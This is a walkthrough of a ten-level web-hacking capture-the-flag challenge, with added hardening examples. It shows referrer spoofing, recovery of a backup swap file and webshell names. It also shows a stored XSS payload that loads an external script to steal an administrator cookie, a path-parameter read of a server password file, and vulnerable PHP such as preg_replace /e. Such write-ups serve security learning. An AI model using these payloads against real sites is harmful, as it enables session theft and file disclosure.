Challenge address: http://attack.onebox.so.com/
Level 1
Q: The second level needs to be accessed from hack.360.cn. Simply clicking a button will not work!~~
A: Set the referrer to http://hack.360.cn/. You can use a browser plug-in (HackBar) to configure it quickly.
URL: http://attack.onebox.so.com/c6c299rf-check.html
Referrer: http://hack.360.cn/
Level 2
Q: Where can I find the password!~~
A: Answer: i360
The page passes in an encrypted JS file: http://attack.onebox.so.com/Public/js/encode.js
Run eval(password);
Level 3
Q: decode the following code:
0x253444253534253435253335253439253434253435253737253444253533253431253738253444253434253637253637253446253534253642253637253444253534253435253738253439253434253435253737253446253533253431253738253444253434253435253637253444253534253435253332253439253434253435253738253444253533253431253331253444253533253431253331253445253433253431253330253446253433253431253344
A: Answer: welcometo360
<?php
// The challenge string without its leading "0x".
$str = '253444253534253435253335253439253434253435253737253444253533253431253738253444253434253637253637253446253534253642253637253444253534253435253738253439253434253435253737253446253533253431253738253444253434253435253637253444253534253435253332253439253434253435253738253444253533253431253331253444253533253431253331253445253433253431253330253446253433253431253344';

// Layer 1: turn each pair of hex digits back into one character.
function hexToStr($hex)
{
    $string = "";
    for ($i = 0; $i < strlen($hex) - 1; $i += 2)
        $string .= chr(hexdec($hex[$i] . $hex[$i + 1]));
    return $string;
}

// Layers 2 and 3: URL-decode, then base64-decode.
$str = base64_decode(urldecode(hexToStr($str)));
// Layer 4: the result is a space-separated list of decimal character codes.
$arr = explode(" ", $str);
foreach ($arr as $key => $val) {
    echo chr($val);
}
Level 4
Q: Find the password for clearing the level in the image (uppercase letters in the image):
A: Answer: BLACKHATWORLD
The image is two JPEG images combined into one file. The hidden image is extracted using the JFIF marker.
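<?php
$str = file_get_contents('pic.jpg');
// With the first image starting at byte 0, the JFIF identifier sits a fixed
// distance after the start of each JPEG, so (last JFIF offset - first JFIF
// offset) is the byte where the second image begins.
file_put_contents('4.jpg', substr($str, strrpos($str, 'JFIF') - strpos($str, 'JFIF')));
echo '';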
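Added example, not part of the original write-up: a more general form of the extraction above that splits a file at every JFIF header instead of assuming exactly two images with the first at offset 0. The function name and the sample bytes are constructed for illustration.

```php
<?php
// A JFIF stream starts with SOI (FF D8), then an APP0 segment:
// FF E0, a 2-byte length, and the identifier "JFIF\0".
function splitConcatenatedJpegs(string $data): array
{
    $starts = [];
    $pos = 0;
    while (($pos = strpos($data, "JFIF\0", $pos)) !== false) {
        $soi = $pos - 6; // the identifier sits 6 bytes after SOI
        if ($soi >= 0 && substr($data, $soi, 4) === "\xFF\xD8\xFF\xE0") {
            $starts[] = $soi;
        }
        $pos += 5;
    }
    // Each stream runs from its SOI to the next SOI (or to end of file).
    $parts = [];
    foreach ($starts as $i => $start) {
        $end = $starts[$i + 1] ?? strlen($data);
        $parts[] = substr($data, $start, $end - $start);
    }
    return $parts;
}

// Constructed sample: two minimal JFIF headers with dummy bodies and EOI markers.
$header = "\xFF\xD8\xFF\xE0\x00\x10JFIF\0\x01\x01\x00\x00\x01\x00\x01\x00\x00";
$sample = $header . "cover-image-data\xFF\xD9" . $header . "hidden-image-data\xFF\xD9";

$parts = splitConcatenatedJpegs($sample);
printf("embedded JPEG streams: %d\n", count($parts));
foreach ($parts as $i => $part) {
    printf("part %d: %d bytes, ends with EOI: %s\n", $i, strlen($part),
        substr($part, -2) === "\xFF\xD9" ? 'yes' : 'no');
}
```

More than one stream in a file that should hold a single image is also a useful signal when validating uploads.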
Level 5
Q: As a hacker, please answer the following questions:
A: php spy angel
Aspx spy admin
Jsp spy ninty
Level 6
Q: Developers have poor security awareness and often forget to delete some backup files.
A: Answer: different accounts
When a file is edited with vi on Linux, a temporary file (.filename.swp) is generated.
http://attack.onebox.so.com/c47e92bak-main.html.swp
<?php
function _getNextKey()
{
    $str = base64_encode("1776qs2p1qo056qsp7sno57nq94p734917268b79f9c2173f4e8164aee8e0eaf6");
    return md5($str);
}
echo _getNextKey();
Level 7
Q: Tip: Based on Li Lei's personal information, you can guess the username and password for the encrypted string. Then decrypt the encrypted string and you will get the key for clearing the level!
Name: Li Lei
Birthday: February 1, March 5, 2014
QQ: 1987654321
Email: 360_lilei@sina.com
Residential Address: 101, Unit 1, building 1, No. 1, Dongcheng District, Beijing
A: Password: Lilei20140305 (name + birthday, uppercase)
Encrypted string: 91199faddb0f5abe576ea087ea708172
Google Search
Answer: 360-hackgame-8-hello-world.php
The page verification code will not automatically expire
Level 8
Q: The following is a piece of PHP code. Select a code line with high-risk security vulnerabilities:
class MyTest
{
    public function __set($key, $name)
    {
        if (isset($this->_var[$key])) {
            return $this->_var[$key];
        }
        return false;
    }
    public function SetTemplate($lang)
    {
        $lang = isset($lang) ? $lang : 'cn';
        include('template/' . $lang . '.php.html');
    }
    public function build($htmlfile='', $htmlpath='', $templateFile='')
    {
        $content = $this->fetch($templateFile);
        $htmlpath = !empty($htmlpath)?$htmlpath:HTML_PATH;
        $htmlfile = $htmlpath.$htmlfile.'HTML_FILE_SUFFIX';
        if(!is_dir(dirname($htmlfile)))
            mkdir(dirname($htmlfile),0755,true);
        if(false === file_put_contents($htmlfile,$content))
            throw new Exception('_CACHE_WRITE_ERROR_'.$htmlfile);
        return $content;
    }
    public function __set($key)
    {
        if(isset($this->_var[$key])) {
            return $this->_var[$key];
        }
    }
    public function Upload($filename)
    {
        $default_path = 'upload/';
        if (!file_exists($default_path))
            mkdir($default_path, 0777, true);
        $destination = $default_path . basename($filename);
        echo 'Saving your image to: ' . $destination;
        $jfh = fopen($destination, 'w') or die("can't open file");
        fwrite($jfh, $GLOBALS['HTTP_RAW_POST_DATA']);
        fclose($jfh);
    }
    public function fetch($templateFile='')
    {
        return file_get_contents($templateFile);
    }
    public function Filter($value,$safecode)
    {
        $value = preg_replace("/(javascript:)?on(click|load|key|mouse|error|abort|move|unload|change|dblclick|move|reset|resize|submit)/i", "&111n\\2", $value);
        $value = preg_replace("/(.*?)<\/script>/si", $safecode, $value);
        $value = preg_replace("/(.*?)<\/iframe>/si", $safecode, $value);
        $value = preg_replace("/(.*?)/e", $safecode, $value);
        $value = preg_replace("//iesU", $safecode, $value);
        return $value;
    }
}
A: Answer:
$value = preg_replace("/(.*?)/e", $safecode, $value); // code execution, function Filter
$value = preg_replace("//iesU", $safecode, $value); // code execution, function Filter
return file_get_contents($templateFile); // file read, function fetch
include('template/' . $lang . '.php.html'); // truncation, function SetTemplate
$destination = $default_path . basename($filename); // arbitrary file name, function Upload
$jfh = fopen($destination, 'w') or die("can't open file"); // function Upload
fwrite($jfh, $GLOBALS['HTTP_RAW_POST_DATA']); // function Upload
I think there is a problem with this question. This class itself cannot run normally. There are two __set methods in it.
The reason why function build is not counted in the answer may be that the code is taken from the ThinkPHP framework.
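Hardened counterparts of the SetTemplate, Upload and Filter lines flagged in the answer, as an added example (not the challenge's code and not ThinkPHP's). The class name, the allow-list and the directory constants are assumptions; the `/e` modifier the answer points at was removed in PHP 7.

```php
<?php
// HardenedTest, ALLOWED_LANGS and the directory layout are hypothetical.
class HardenedTest
{
    private const ALLOWED_LANGS = ['cn', 'en'];
    private const TEMPLATE_DIR  = __DIR__ . '/template';
    private const UPLOAD_DIR    = __DIR__ . '/upload';

    // SetTemplate: only an allow-listed name is ever concatenated into include.
    public function setTemplate(?string $lang): void
    {
        $lang = in_array($lang, self::ALLOWED_LANGS, true) ? $lang : 'cn';
        include self::TEMPLATE_DIR . '/' . $lang . '.php.html';
    }

    // Upload: the server picks the name and extension after checking that the
    // content is an image, and the directory is not world-writable.
    public function upload(string $rawBody): string
    {
        $info = @getimagesizefromstring($rawBody);
        $ext  = [IMAGETYPE_JPEG => 'jpg', IMAGETYPE_PNG => 'png'][$info[2] ?? 0] ?? null;
        if ($ext === null) {
            throw new RuntimeException('not an accepted image type');
        }
        if (!is_dir(self::UPLOAD_DIR)) {
            mkdir(self::UPLOAD_DIR, 0750, true);
        }
        $destination = self::UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
        file_put_contents($destination, $rawBody, LOCK_EX);
        return $destination;
    }

    // Filter: no /e modifier and no caller-supplied replacement evaluated as
    // code; untrusted text is HTML-encoded at output time instead.
    public function filter(string $value): string
    {
        return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}

// Constructed inputs: an event-handler tag and a non-image upload body.
$t = new HardenedTest();
echo $t->filter('<svg/onload=example()>'), "\n";
try {
    $t->upload('<?php echo 1;');
} catch (RuntimeException $e) {
    echo 'upload rejected: ', $e->getMessage(), "\n";
}
```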
Level 9
Q: This is a message board. Can you get the cookie of the message manager? Use the HTML5 tag feature [for example, SVG tag] ~~
A: Message content: <svg/onload=document.body.appendChild(createElement(/script/.source)).src=String.fromCharCode(99,110,103,101)
Cookie value: cc4b0a94f5a2e5a244a1cc44a7fb4cb3
Level 10
Q: This guy is very lazy and does not leave anything. You can only find a solution on your own!
A: The cookie contains one extra value: display=5842b0a0df2d52533c241c6ec26089a8.
Append it to the page address to find the real question: http://attack.onebox.so.com/jdad3f8fasd0d-main.html?display=5842b0a0df2d52533c241c6ec26089a8
Q: We use CentOS and APACHE to provide services for you. The password for clearing the level is located at /home/s/pwd/b2465636f70be8994fd3c98015c03c12.txt.
A: http://attack.onebox.so.com/jdad3f8fasd0d-main.html?display=5842b0a0df2d52533c241c6ec26089a8&path=/home/s/pwd/b2465636f70be8994fd3c98015c03c12.txt
Check: d914e3ecf6cc481114a3f534a5faf90b + 9fd30a9a7b2a862032dcb6374c6a827b! 3fb80afe3936b4ef0f76446ee46024d5
Cleared successfully
Congratulations, you have successfully cleared all the levels. 360 Network Attack and Defense Lab is looking forward to your participation.
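The path parameter in Level 10 and fetch() in Level 8 both read whatever file name the request supplies. An added example (not the challenge's code) of a reader that only serves files resolving inside one base directory; readContained() and the demo directory layout are hypothetical.

```php
<?php
function readContained(string $baseDir, string $userPath): string
{
    $base = realpath($baseDir);
    if ($base === false) {
        throw new RuntimeException('base directory missing');
    }
    // Always treat the parameter as relative to the base; realpath() then
    // collapses "..", symlinks and duplicate slashes before the comparison.
    $real   = realpath($base . DIRECTORY_SEPARATOR . $userPath);
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($real === false || strncmp($real, $prefix, strlen($prefix)) !== 0 || !is_file($real)) {
        throw new RuntimeException('path rejected');
    }
    return file_get_contents($real);
}

// Constructed demo tree in the system temp directory.
$root = sys_get_temp_dir() . '/contain-demo-' . bin2hex(random_bytes(4));
mkdir($root . '/pages', 0700, true);
file_put_contents($root . '/pages/main.html', 'public page');
file_put_contents($root . '/secret.txt', 'password file outside the base');

// A normal name, a relative escape, and an absolute path like the one in Level 10.
foreach (['main.html', '../secret.txt', $root . '/secret.txt'] as $param) {
    try {
        printf("%-45s => %s\n", $param, readContained($root . '/pages', $param));
    } catch (RuntimeException $e) {
        printf("%-45s => %s\n", $param, $e->getMessage());
    }
}
```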